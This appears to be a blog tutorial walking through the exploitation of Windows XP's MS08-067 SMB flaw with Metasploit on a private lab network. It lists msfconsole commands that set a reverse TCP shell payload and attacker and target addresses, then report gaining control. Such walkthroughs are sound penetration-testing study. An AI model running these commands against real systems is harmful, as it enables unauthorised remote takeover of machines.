Exploit Windows XP with Metasploit Framework msfconsole

Okey, this time we will learn about the exploitation. Previously, we've learned about how to use the exploit-db exploitation. As we are required to perform their duties exploitable Windows XP using metasploit.

Let's start..


Remember, before we do the exploitation, we have to step Information Gathering, Service Enumeration, and Vulnerability Assessment, it shall be done!
Of those three things, we will be able to find a hole that we will do exploits. 

By using Nessus, we will be able to find some holes with a high level that we can exploit. As an example I will do exploits in SMB Vulnerability on port 445.

1. Open metasploit msfconsole contained Backtrack tool, Exploitation Tools, or just open the terminal and type msfconsole.

2.  And then, type the command like below..

msf > set payload windows/shell/reverse_tcp

 3. Then we give the following commands, to reach the target vulner directory in metasploit.

msf > use exploit/windows/smb/ms08_067_netapi

4.  Then we use the set command LHOST, fill in the IP address that we have.

msf  exploit(ms08_067_netapi) > set lhost 192.168.56.1

 5. Set the rhost, enter the IP target address behind.

msf  exploit(ms08_067_netapi) > set rhost 192.168.56.101

6. Type show options, see what everything is fulfilled.

msf  exploit(ms08_067_netapi) > show options

7. If all the Required column contains "yes", then all is fulfilled and Windows ready exploitation. Just type exploit like below.

msf  exploit(ms08_067_netapi) > exploit

 Windows XP is under control.

8.   Okay, to test it, we will try to create a directory in Windows XP. I'm trying to create a new folder on the desktop with the name MetasploitTest. And this is the result...
Folder MetasploitTest has been created..